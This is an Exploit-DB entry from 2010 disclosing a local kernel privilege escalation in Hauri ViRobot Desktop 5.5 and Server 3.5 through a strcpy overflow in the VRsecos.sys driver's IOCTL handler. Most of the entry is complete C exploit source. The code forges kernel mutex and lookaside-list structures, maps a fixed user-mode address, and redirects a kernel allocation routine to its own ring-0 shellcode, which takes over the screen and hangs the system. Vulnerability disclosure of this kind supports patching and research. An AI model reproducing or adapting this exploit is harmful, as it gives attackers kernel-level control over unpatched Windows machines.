ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation Vulnerability

2010-12-17T00:00:00
ID EDB-ID:15764
Type exploitdb
Reporter MJ0011
Modified 2010-12-17T00:00:00

Description

ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation Vulnerability. Local exploit for windows platform

                                        
                                            Hauri 
 ViRobot Desktop 5.5 & ViRobot Server 3.5 VRsecos.sys &lt;=2008.8.1.1 Local Kernel Mode Privilege Escalation Vulnerability


AUTHOR
MJ0011

EMAIL
th_decoder$126.com

VULNERABLE PRODUCTS
Hauri ViRobot Desktop 5.5 and below
Hauri ViRobot Server 3.5 and below

DETAILS:
VRsecos.sys create a device called "VRsecos" , and handles DeviceIoControl Code = 0x8307202c , which use the function "strcpy" to copy memory from irp systembuffer to driver's data area , can be overwrite critical kernel object memory in vrsecos.sys ' s data area


EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1)
\
// virobot0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
#include "malloc.h"
typedef struct X_DISPATCHER_HEADER{
UCHAR Type ; 
UCHAR Absolute ; 
UCHAR Size ; 
UCHAR Inserted ; 
ULONG SignalState ; 
LIST_ENTRY WaitListHead ; 
}X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
typedef struct X_KMUTANT{
X_DISPATCHER_HEADER Header ; 
LIST_ENTRY MutantListEntry ; 
PVOID OwnerThread ; 
UCHAR Abandoned ; 
UCHAR ApcDisable ; 
}X_KMUTANT , *PX_KMUTANT;
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");

do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
  ULONG x1,
  ULONG y1,
  ULONG x2,
  ULONG y2,
  ULONG color
    );
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
  ULONG Color
    );
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
  PUCHAR *Str
    );
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
    INBV_DISPLAY_STRING_FILTER DisplayStringFilter
    );
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
    BOOLEAN bEnable
    );
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
    ULONG x1,
    ULONG y1,
    ULONG x2,
    ULONG y2
    );
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
    PUCHAR Str
    );
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ; 
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ; 
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ; 
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ; 
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ; 
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ; 
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ; 
PINBV_DISPLAY_STRING InbvDisplayString= 0 ; 
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] = 
"                                                                                "

"                                                                                "

"                                                                                "

"                ---- ===== EXPLOIT SUCCESSFULLY ==== ----                       "

"                                                                                "

"                                                                                "

" ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit    "

"                                                                                "

" VULNERABLE PRODUCT                                                             "

"                                                                                "

" ViRobot Desktop 5.5 and below                                                  "

" ViRobot Server 3.5 and below                                                   "

"                                                                                "

" VULERABLE FILE                                                                 "

" VRsecos.sys &lt;= 2008.8.1.1                                                      "

"                                                                                "

" AUTHOR                                                                         "

"                                                                                "

" MJ0011                                                                         "

" th_decoder$126.com                                                             "

"                                                                                "

" 2010-8-22                                                                      "

"                                                                                "

"                                                                                "

"                                                                                ";

VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ; 
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);

InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);

InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);

InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);

InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);

InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);

InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);

InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);

if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ; 
}
return FALSE ; 
}
int main(int argc, char* argv[])
{
printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys &lt;= 2008.8.1.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"This Exploit Code Only for vrsecos == 2008.8.1.1\n"
"Test On Windows XP SP3\n\n"
"By MJ0011 th_decoder$126.com\n\n"
"Press Enter\n");
getchar();
HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );

if (hDev == INVALID_HANDLE_VALUE)
{
printf("cannot open device....%u\n" , GetLastError());
//return 0;
}
//data for IoControlCode = 8307202C , buffer overrun
PVOID pdata = malloc(0x2000);
//fill non-zero data
memset(pdata , 0x20 , 0x2000);
//process mutx ...
PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);

PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);

//get base address of vrsecos.sys
PVOID vrsecosbase = 0 ; 
ULONG i ;
for (i = 0 ; i &lt; pmi-&gt;Count ; i ++)
{
if (stricmp((PCHAR)(pmi-&gt;Module[i].ImageName + strlen(pmi-&gt;Module[i].ImageName ) - strlen("vrsecos.sys")) ,

"vrsecos.sys") == 0 )
{
vrsecosbase = pmi-&gt;Module[i].Base;
break ; 
}
}
if (vrsecosbase == 0 )
{
printf("cannot find vrsecos....\n");
//return 0 ; 
}
if (!InbvInit(pmi-&gt;Module[0].Base , strrchr(pmi-&gt;Module[0].ImageName , '\\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
//get thread object
PVOID MyThreadOBJ = NULL ;
for (i = 0 ;  i &lt; phi-&gt;NumberOfHandles ; i ++)
{
if (phi-&gt;Information[i].HandleValue == (USHORT)hthread &&
phi-&gt;Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId())
{
MyThreadOBJ = phi-&gt;Information[i].Object;
break ; 
}
}
if (MyThreadOBJ == NULL)
{
printf("cannot find my thread object\n");
return 0 ;
}
//for KeWaitForSignleObject
//KeWaitForSignleObject will check SignalState
pmutant-&gt;Header.SignalState = 0x30303030;
pmutant-&gt;MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 ); 
pmutant-&gt;MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ; 
//for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex

pmutant-&gt;OwnerThread = MyThreadOBJ; 
//for IOCTL CODE 0x83072014
//spec NPAGED_LOOKASIDE_LIST List
//
// user address space 
PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);

if (pAlloc == NULL)
{
printf("cannot allocate spec addr %u\n! ", GetLastError());
return 0 ; 
}
*(DWORD*)0x0a0a0101 = 0 ; 
// vrsecos+2d68 &lt; vrsecos+2d64
// and vrsecos+2d68 &lt; 0
*(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ; 
*(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
//fill NPAGED_LOOKASIDE_LIST
*(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
*(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
//fill NPAGE_LOOKASIDE_LIST-&gt;AllocateRoutine
//is our R0 Shell Code !!!
*(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
ULONG btr ; 
ULONG temp;
//memory overflow!!
if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))

{
printf("dev ctl 1 failed %u\n", GetLastError());
return 0 ; 
}
PVOID pdata2 = malloc(0x6d4);
*(DWORD*)pdata2 = 1; 
*(ULONG*)((ULONG)pdata2 + 8 ) = 0 ; 
strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
//first time , NPAGED_LOOKASIDE_LIST got ZERO !!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ; 
}
//second time , go NPAGED_LOOKASIDE_LIST-&gt;AllocateRoutine!!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ; 
}
return 0 ; 
}